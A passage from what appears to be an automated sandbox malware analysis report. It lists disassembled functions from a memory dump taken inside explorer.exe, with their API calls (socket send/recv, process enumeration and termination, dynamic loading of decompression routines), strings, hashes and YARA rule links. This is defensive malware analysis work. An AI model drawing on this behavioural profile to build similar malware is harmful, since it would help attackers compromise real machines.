                                                                              • Part of subcall function 00C04500: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C04594
                                                                              • Part of subcall function 00C04500: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C045A3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0448B
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            • und_memcpy.LIBCMTD ref: 00C044C9
                                                                            • LocalFree.KERNEL32 ref: 00C044D3
                                                                            • LocalFree.KERNEL32 ref: 00C044E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3834521385-0
                                                                            • Opcode ID: c628b2971ef1d7fa39ecd60ecf32e56224b5876f56dc8635161cab482b22f9b8
                                                                            • Instruction ID: c9aebe251a9b30170871bb6b972ea9323d67cc22e989f6295425c829422db5f7
                                                                            • Opcode Fuzzy Hash: c628b2971ef1d7fa39ecd60ecf32e56224b5876f56dc8635161cab482b22f9b8
                                                                            • Instruction Fuzzy Hash: 7541C276618B8486DB509B5AE49071EBBB0F7CAB94F208116EF8D43B68CF3DC585CB00
                                                                            Function 00C10A7C Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _FF_MSGBANNER.LIBCMT ref: 00C10AA3
                                                                              • Part of subcall function 00C0EAEC: _set_error_mode.LIBCMT ref: 00C0EAF5
                                                                              • Part of subcall function 00C0EAEC: _set_error_mode.LIBCMT ref: 00C0EB04
                                                                              • Part of subcall function 00C0E88C: _set_error_mode.LIBCMT ref: 00C0E8D1
                                                                              • Part of subcall function 00C0E88C: _set_error_mode.LIBCMT ref: 00C0E8E2
                                                                              • Part of subcall function 00C0E88C: GetModuleFileNameW.KERNEL32 ref: 00C0E944
                                                                              • Part of subcall function 00C0E4DC: ExitProcess.KERNEL32 ref: 00C0E4EB
                                                                              • Part of subcall function 00C1059C: malloc.LIBCMT ref: 00C105C7
                                                                              • Part of subcall function 00C1059C: Sleep.KERNEL32(?,?,00000000,00C10ADD,?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C), ref: 00C105DA
                                                                            • _errno.LIBCMT ref: 00C10AE5
                                                                            • _lock.LIBCMT ref: 00C10AF9
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C,?,?,00000000,00C0AC73), ref: 00C10B0F
                                                                            • free.LIBCMT ref: 00C10B1C
                                                                            • _errno.LIBCMT ref: 00C10B21
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00C10B87,?,?,00000000,00C0AB85,?,?,00000000,00C0AC3C,?,?,00000000,00C0AC73), ref: 00C10B44
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                            • String ID:
                                                                            • API String ID: 113790786-0
                                                                            • Opcode ID: 139fafca0270282442084b567f0d1ea6b64a20e92c57c459f4d7fb58f8924735
                                                                            • Instruction ID: c180d9b49b1f3fb4faa489c99a6268d35022570ae60082eb826e83fa1b445163
                                                                            • Opcode Fuzzy Hash: 139fafca0270282442084b567f0d1ea6b64a20e92c57c459f4d7fb58f8924735
                                                                            • Instruction Fuzzy Hash: 8621E23164974482E714BF51E4547BA7365FB82B88F248634EA4A47795CFBCC8C0F341
                                                                            Function 00BE1BA0 Relevance: 12.1, APIs: 8, Instructions: 57processstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1193533834-0
                                                                            • Opcode ID: ebb3c86145ac574251e1cd260c97c5d9e44848db4e64dd633c1b28d872071a6e
                                                                            • Instruction ID: 0485ff5bc7bbc8aac443a04738d567042cf072616406b57d331e4a4428dfccc7
                                                                            • Opcode Fuzzy Hash: ebb3c86145ac574251e1cd260c97c5d9e44848db4e64dd633c1b28d872071a6e
                                                                            • Instruction Fuzzy Hash: 2521BE36218AC086EB70DB26E49876AB3A1F7C4755F604725E59E877A8DF3CC549CB00
                                                                            Function 00C0F268 Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStartupInfoW.KERNEL32 ref: 00C0F289
                                                                              • Part of subcall function 00C1061C: Sleep.KERNEL32(?,?,00000000,00C0AC17,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C10661
                                                                            • GetFileType.KERNEL32 ref: 00C0F3F4
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00C0F432
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                            • String ID:
                                                                            • API String ID: 3473179607-0
                                                                            • Opcode ID: a00637d672def6d122fb50bd6454bd482480a36c2ec44e850849cd03ac59f6d6
                                                                            • Instruction ID: 7af91991041d3da56048495e055d8e90afe92f1b3641367aafbd26a25159f4e9
                                                                            • Opcode Fuzzy Hash: a00637d672def6d122fb50bd6454bd482480a36c2ec44e850849cd03ac59f6d6
                                                                            • Instruction Fuzzy Hash: EB81BE72305B8586EB248F25E49472A7760F745B78F588339CA7A437E5EB38C99AC300
                                                                            Function 00BF3AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 2857295742-2564639436
                                                                            • Opcode ID: 5ea8502d127409c30e8f0cea037d491faaf09cef2e6c29c55e03e349b4fcb175
                                                                            • Instruction ID: 1d117e47220fa809f9264895c7928abffe3975bd864bc8743443f06f76dcc330
                                                                            • Opcode Fuzzy Hash: 5ea8502d127409c30e8f0cea037d491faaf09cef2e6c29c55e03e349b4fcb175
                                                                            • Instruction Fuzzy Hash: EA71C922305E4481EF74CB05E4E973AA3A1FBE8B05F551626A68E877B4EF3CC659C704
                                                                            Function 00C041B0 Relevance: 10.6, APIs: 7, Instructions: 92timememorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C04210
                                                                            • htons.WS2_32 ref: 00C0423D
                                                                              • Part of subcall function 00C04620: WSACreateEvent.WS2_32 ref: 00C04638
                                                                              • Part of subcall function 00C04620: WSAEventSelect.WS2_32 ref: 00C0465F
                                                                              • Part of subcall function 00C04620: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046B4
                                                                              • Part of subcall function 00C04620: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046C3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04290
                                                                              • Part of subcall function 00C033B0: send.WS2_32 ref: 00C033DC
                                                                              • Part of subcall function 00C04500: WSACreateEvent.WS2_32 ref: 00C04518
                                                                              • Part of subcall function 00C04500: WSAEventSelect.WS2_32 ref: 00C0453F
                                                                              • Part of subcall function 00C04500: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C04594
                                                                              • Part of subcall function 00C04500: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C045A3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C042D5
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            • und_memcpy.LIBCMTD ref: 00C04313
                                                                            • LocalFree.KERNEL32 ref: 00C0431D
                                                                            • LocalFree.KERNEL32 ref: 00C0432C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 2815282806-0
                                                                            • Opcode ID: 2359b2d6565aaa4b204a568f32a6c0dcb9d4575f061479a5979857e6b9d1f1f7
                                                                            • Instruction ID: 326c29f6303e6fc01a4af67c1c1f8222cc841b2b305dd58c7d391804ce4f6d12
                                                                            • Opcode Fuzzy Hash: 2359b2d6565aaa4b204a568f32a6c0dcb9d4575f061479a5979857e6b9d1f1f7
                                                                            • Instruction Fuzzy Hash: 8041C476618A8486CB54DB1AE49161EBBB0F7CAB90F605116FF8D43B68CB3EC945CF00
                                                                            Function 00C13274 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_close_nolock_errno
                                                                            • String ID:
                                                                            • API String ID: 186997739-0
                                                                            • Opcode ID: 3a164365ed6fe073fd96fd06b95ea34268e68433a44d5ad6ee624808fdf896cc
                                                                            • Instruction ID: b4e85658927d8d76b3bae95b8eb5e014cdfa90da59ff5971ab90503cc760e421
                                                                            • Opcode Fuzzy Hash: 3a164365ed6fe073fd96fd06b95ea34268e68433a44d5ad6ee624808fdf896cc
                                                                            • Instruction Fuzzy Hash: FB110D327007C485D3056F25DC8575D6A10A782775FA64624E639073E7CF7CC9C2E315
                                                                            Function 00BFE180 Relevance: 10.6, APIs: 7, Instructions: 52filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 419579968f7a26765f9e3bd4c3083404088b25ce3d706b4e9fed65b2504746c1
                                                                            • Instruction ID: 9c550ab40709783908fb054b4e3683cd92da4ab1901cd42a4c0d00c0674f4fa8
                                                                            • Opcode Fuzzy Hash: 419579968f7a26765f9e3bd4c3083404088b25ce3d706b4e9fed65b2504746c1
                                                                            • Instruction Fuzzy Hash: 66219636618A8487E710DF55F46472AB7B4F3C5BA4F204615EBA943BA8DF7DC849CB00
                                                                            Function 00C01A90 Relevance: 10.6, APIs: 7, Instructions: 52filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 8e99e4d5ebc970ea99c1b4cc043f3387283bc053afeb868c42a72b48d6d4cbb0
                                                                            • Instruction ID: 7a1747a0a714f49aac30a48a91d54821e0bf96513f9b16f7e9ee6dd99da8a36b
                                                                            • Opcode Fuzzy Hash: 8e99e4d5ebc970ea99c1b4cc043f3387283bc053afeb868c42a72b48d6d4cbb0
                                                                            • Instruction Fuzzy Hash: 9121C576218A4487E710DB15F45475AB7B0F3CA7A4F204215EB9943BA8DF7DC949CB00
                                                                            Function 00BF2230 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BF2253
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF2295
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                                                                            • API String ID: 3092845267-3707798339
                                                                            • Opcode ID: cbde160e3633601e06a282f983d34d04294b31e50943011d2a850624e003afad
                                                                            • Instruction ID: 689fd128117ab344db26319169fe054f191ca1e7703b37bdb7725b321371197e
                                                                            • Opcode Fuzzy Hash: cbde160e3633601e06a282f983d34d04294b31e50943011d2a850624e003afad
                                                                            • Instruction Fuzzy Hash: C11133B1618685C7EB14DB51E8907AF73A0F7C2784F604166FB8647AA8CF7CC889CB51
                                                                            Function 00BF3A60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                                                                            • API String ID: 667068680-1459209654
                                                                            • Opcode ID: c49bb1680fc37cf61b2d4e13cc9f2760060c892c941fe8037a720ad3c4a5f063
                                                                            • Instruction ID: 5815ee77cdbda207cd570683f1e937838250de937696467ea24d52ff697a2130
                                                                            • Opcode Fuzzy Hash: c49bb1680fc37cf61b2d4e13cc9f2760060c892c941fe8037a720ad3c4a5f063
                                                                            • Instruction Fuzzy Hash: 2CF0B235619F4881F7219B05F898BA933E1F789B54F488726C98D822B5EF7CC69DC601
                                                                            Function 00C0F174 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F18D
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F1E4
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F21F
                                                                            • free.LIBCMT ref: 00C0F22C
                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F237
                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F245
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                                                            • String ID:
                                                                            • API String ID: 517548149-0
                                                                            • Opcode ID: 8b0577917117d9606411091278825d6838e1e9b7f4213f38495a6774c307670f
                                                                            • Instruction ID: 28e53447a77354cec7b8d51c7fe2f671607bb3ed5bbec6feeb3dcacbff32ebdd
                                                                            • Opcode Fuzzy Hash: 8b0577917117d9606411091278825d6838e1e9b7f4213f38495a6774c307670f
                                                                            • Instruction Fuzzy Hash: FC21C532609B80C6EB24DF62B44076D77A4F789FC0F484128DE8A07B98DF78D592C704
                                                                            Function 00C0ABE4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0ABEE
                                                                            • FlsGetValue.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0ABFC
